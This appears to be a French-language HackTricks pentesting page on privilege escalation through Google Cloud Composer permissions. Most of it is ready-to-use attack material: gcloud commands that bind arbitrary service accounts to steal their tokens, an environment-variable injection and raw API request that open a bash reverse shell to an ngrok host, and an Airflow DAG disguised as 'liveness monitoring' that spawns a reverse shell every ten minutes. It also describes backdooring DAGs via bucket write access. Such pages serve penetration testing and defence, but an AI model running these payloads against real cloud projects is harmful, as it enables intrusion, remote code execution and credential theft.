# GCP - Composer Privesc

{{#include ../../../banners/hacktricks-training.md}}

## composer

Plus d'infos dans :

{{#ref}}
../gcp-services/gcp-composer-enum.md
{{#endref}}

### `composer.environments.create`

Il est possible de **lier n'importe quel compte de service** au nouvel environnement composer créé avec cette permission. Plus tard, vous pourriez exécuter du code à l'intérieur de composer pour voler le jeton du compte de service.
```bash
gcloud composer environments create privesc-test \
--project "${PROJECT_ID}" \
--location europe-west1 \
--service-account="${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com"
```
Plus d'infos sur l'exploitation [**ici**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/i-composer.environmets.create.sh).

### `composer.environments.update`

Il est possible de mettre à jour l'environnement composer, par exemple, en modifiant les variables d'environnement :
```bash
# Even if it says you don't have enough permissions the update happens
gcloud composer environments update \
projects/<project-id>/locations/<location>/environments/<composer-env-name> \
--update-env-variables="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/19990 0>&1' & #%s" \
--location <location> \
--project <project-id>

# Call the API endpoint directly
PATCH /v1/projects/<project-id>/locations/<location>/environments/<composer-env-name>?alt=json&updateMask=config.software_config.env_variables HTTP/2
Host: composer.googleapis.com
User-Agent: google-cloud-sdk gcloud/480.0.0 command/gcloud.composer.environments.update invocation-id/826970373cd441a8801d6a977deba693 environment/None environment-version/None client-os/MACOSX client-os-ver/23.4.0 client-pltf-arch/arm interactive/True from-script/False python/3.12.3 term/xterm-256color (Macintosh; Intel Mac OS X 23.4.0)
Accept-Encoding: gzip, deflate, br
Accept: application/json
Content-Length: 178
Content-Type: application/json
X-Goog-Api-Client: cred-type/sa
Authorization: Bearer [token]
X-Allowed-Locations: 0x0

{"config": {"softwareConfig": {"envVariables": {"BROWSER": "/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1' & #%s", "PYTHONWARNINGS": "all:0:antigravity.x:0:0"}}}}
```
TODO : Obtenir RCE en ajoutant de nouveaux paquets pypi à l'environnement

### Télécharger les Dags

Vérifiez le code source des dags en cours d'exécution :
```bash
mkdir /tmp/dags
gcloud composer environments storage dags export --environment <environment> --location <loc> --destination /tmp/dags
```
### Importer des Dags

Ajoutez le code DAG python dans un fichier et importez-le en exécutant :
```bash
# TODO: Create dag to get a rev shell
gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py
```
DAG de shell invers :
```python:reverse_shell.py
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import timedelta

default_args = {
'start_date': airflow.utils.dates.days_ago(0),
'retries': 1,
'retry_delay': timedelta(minutes=5)
}

dag = DAG(
'reverse_shell',
default_args=default_args,
description='liveness monitoring dag',
schedule_interval='*/10 * * * *',
max_active_runs=1,
catchup=False,
dagrun_timeout=timedelta(minutes=10),
)

# priority_weight has type int in Airflow DB, uses the maximum.
t1 = BashOperator(
task_id='bash_rev',
bash_command='bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/14382 0>&1',
dag=dag,
depends_on_past=False,
priority_weight=2**31 - 1,
do_xcom_push=False)
```
### Accès en écriture au bucket Composer

Tous les composants d'un environnement composer (DAGs, plugins et données) sont stockés dans un bucket GCP. Si l'attaquant a des permissions de lecture et d'écriture sur celui-ci, il pourrait surveiller le bucket et **chaque fois qu'un DAG est créé ou mis à jour, soumettre une version compromise** afin que l'environnement composer récupère la version compromise depuis le stockage.

Obtenez plus d'infos sur cette attaque dans :

{{#ref}}
gcp-storage-privesc.md
{{#endref}}

### Importer des Plugins

TODO: Vérifier ce qui est possible de compromettre en téléchargeant des plugins

### Importer des Données

TODO: Vérifier ce qui est possible de compromettre en téléchargeant des données

{{#include ../../../banners/hacktricks-training.md}}
